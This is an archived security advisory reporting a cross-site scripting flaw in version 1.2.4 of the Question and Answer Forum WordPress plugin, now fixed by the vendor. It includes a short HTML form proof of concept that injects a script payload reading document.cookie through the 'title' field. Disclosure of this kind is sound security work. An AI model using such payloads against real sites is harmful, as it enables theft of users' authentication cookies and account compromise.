[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22861: XSS in Question and Answer Forum wordpress plugin



Vulnerability ID: HTB22861
Reference: http://www.htbridge.ch/advisory/xss_in_question_and_answer_forum_wordpress_plugin.html
Product: Question and Answer Forum wordpress plugin
Vendor: David Woodford ( hhttp://trevorpythag.co.uk ) 
Vulnerable Version: 1.2.4
Vendor Notification: 15 February 2011 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/wp-content/plugins/question-and-answer-forum/askquestionform.php" script to properly sanitize user-supplied input in "title" variable.
User can execute arbitrary JavaScript code within the vulnerable application.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

The following PoC is available:


<form action="http://wordpress/?page_id=[page_id]"; method="post" name="main" >
<input type="hidden" name="title" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="submit" name="submit" />
</form>

Solution: Upgrade to the most recent version